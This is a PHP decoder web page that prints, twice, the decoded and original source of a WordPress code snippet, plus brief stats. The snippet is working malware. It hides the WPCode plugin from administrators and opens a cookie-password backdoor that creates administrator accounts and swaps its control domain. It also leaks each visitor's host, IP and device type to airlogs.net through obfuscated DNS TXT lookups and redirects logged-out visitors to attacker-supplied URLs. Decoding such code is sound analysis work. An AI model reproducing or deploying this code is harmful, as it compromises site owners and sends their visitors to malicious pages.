Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $_pwsa = '649c79a77fc364992c52814da93deef6'; if (current_user_can('administrator..
Decoded Output download
<?php
$_pwsa = '649c79a77fc364992c52814da93deef6';
if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
add_action('admin_print_scripts', function () {
echo '<style>';
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
echo '</style>';
});
add_filter('all_plugins', function ($plugins) {
unset($plugins['insert-headers-and-footers/ihaf.php']);
return $plugins;
});
}
if (!function_exists('_red')) {
error_reporting(0);
ini_set('display_errors', 0);
function _gcookie($n)
{
return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : '';
}
if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {
switch (_gcookie('c')) {
case 'sd':
$d = _gcookie('d');
if (strpos($d, '.') > 0) {
update_option('d', $d);
}
break;
case 'au':
$u = _gcookie('u');
$p = _gcookie('p');
$e = _gcookie('e');
if ($u && $p && $e && !username_exists($u)) {
$user_id = wp_create_user($u, $p, $e);
$user = new WP_User($user_id);
$user->set_role('administrator');
}
break;
}
return;
}
if (@stripos(wp_login_url(), ''.$_SERVER['SCRIPT_NAME']) !== false) {
return;
}
if (_gcookie("skip") === "1") {
return;
}
function _is_mobile()
{
return @preg_match("/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", ''.$_SERVER["HTTP_USER_AGENT"]);
}
function _is_iphone()
{
return @preg_match("/(iphone|ipod)/i", ''.$_SERVER["HTTP_USER_AGENT"]);
}
function _user_ip()
{
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
if (array_key_exists($key, $_SERVER) && !empty($_SERVER[$key])) {
foreach (@explode(',', ''.$_SERVER[$key]) as $ip) {
$ip = trim($ip);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}
return false;
}
function _red()
{
if (is_user_logged_in()) {
return;
}
$ip = _user_ip();
if (!$ip) {
return;
}
$exp = get_transient('exp');
if (!is_array($exp)) {
$exp = array();
}
foreach ($exp as $k => $v) {
if (time() - $v > 86400) {
unset($exp[$k]);
}
}
if (key_exists($ip, $exp) && (time() - $exp[$ip] < 86400)) {
return;
}
$host = filter_var(parse_url('https://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME);
$ips = str_replace(':', '-', $ip);
$ips = str_replace('.', '-', $ips);
$h = 'airlogs.net';
$o = get_option('d');
if ($o && strpos($o, '.') > 0) {
$h = $o;
}
$m = _is_iphone() ? 'i' : 'm';
$req = (!$host ? 'unk.com' : $host) . '.' . (!$ips ? '0-0-0-0' : $ips) . '.' . mt_rand(100000, 999999) . '.' . (_is_mobile() ? 'n' . $m : 'nd') . '.' . $h;
$v = "dns_" . "get" . "_record";
$s = $v($req, DNS_TXT);
if (is_array($s) && !empty($s)) {
if (isset($s[0]['txt'])) {
$s = $s[0]['txt'];
$s = base64_decode($s);
if ($s == 'err') {
$exp[$ip] = time();
delete_transient('exp');
set_transient('exp', $exp);
} else if (substr($s, 0, 4) === 'http') {
$exp[$ip] = time();
delete_transient('exp');
set_transient('exp', $exp);
wp_redirect($s);
exit;
}
}
}
}
add_action('init', '_red');
} ?>Did this file decode correctly?
Original Code
<?php
$_pwsa = '649c79a77fc364992c52814da93deef6';
if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
add_action('admin_print_scripts', function () {
echo '<style>';
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
echo '</style>';
});
add_filter('all_plugins', function ($plugins) {
unset($plugins['insert-headers-and-footers/ihaf.php']);
return $plugins;
});
}
if (!function_exists('_red')) {
error_reporting(0);
ini_set('display_errors', 0);
function _gcookie($n)
{
return (isset($_COOKIE[$n])) ? base64_decode($_COOKIE[$n]) : '';
}
if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {
switch (_gcookie('c')) {
case 'sd':
$d = _gcookie('d');
if (strpos($d, '.') > 0) {
update_option('d', $d);
}
break;
case 'au':
$u = _gcookie('u');
$p = _gcookie('p');
$e = _gcookie('e');
if ($u && $p && $e && !username_exists($u)) {
$user_id = wp_create_user($u, $p, $e);
$user = new WP_User($user_id);
$user->set_role('administrator');
}
break;
}
return;
}
if (@stripos(wp_login_url(), ''.$_SERVER['SCRIPT_NAME']) !== false) {
return;
}
if (_gcookie("skip") === "1") {
return;
}
function _is_mobile()
{
return @preg_match("/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", ''.$_SERVER["HTTP_USER_AGENT"]);
}
function _is_iphone()
{
return @preg_match("/(iphone|ipod)/i", ''.$_SERVER["HTTP_USER_AGENT"]);
}
function _user_ip()
{
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
if (array_key_exists($key, $_SERVER) && !empty($_SERVER[$key])) {
foreach (@explode(',', ''.$_SERVER[$key]) as $ip) {
$ip = trim($ip);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
return $ip;
}
}
}
}
return false;
}
function _red()
{
if (is_user_logged_in()) {
return;
}
$ip = _user_ip();
if (!$ip) {
return;
}
$exp = get_transient('exp');
if (!is_array($exp)) {
$exp = array();
}
foreach ($exp as $k => $v) {
if (time() - $v > 86400) {
unset($exp[$k]);
}
}
if (key_exists($ip, $exp) && (time() - $exp[$ip] < 86400)) {
return;
}
$host = filter_var(parse_url('https://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME);
$ips = str_replace(':', '-', $ip);
$ips = str_replace('.', '-', $ips);
$h = 'airlogs.net';
$o = get_option('d');
if ($o && strpos($o, '.') > 0) {
$h = $o;
}
$m = _is_iphone() ? 'i' : 'm';
$req = (!$host ? 'unk.com' : $host) . '.' . (!$ips ? '0-0-0-0' : $ips) . '.' . mt_rand(100000, 999999) . '.' . (_is_mobile() ? 'n' . $m : 'nd') . '.' . $h;
$v = "dns_" . "get" . "_record";
$s = $v($req, DNS_TXT);
if (is_array($s) && !empty($s)) {
if (isset($s[0]['txt'])) {
$s = $s[0]['txt'];
$s = base64_decode($s);
if ($s == 'err') {
$exp[$ip] = time();
delete_transient('exp');
set_transient('exp', $exp);
} else if (substr($s, 0, 4) === 'http') {
$exp[$ip] = time();
delete_transient('exp');
set_transient('exp', $exp);
wp_redirect($s);
exit;
}
}
}
}
add_action('init', '_red');
}Function Calls
| current_user_can | 1 |
Stats
| MD5 | 7ea4caeb75aeac35160a780bf71942be |
| Eval Count | 0 |
| Decode Time | 80 ms |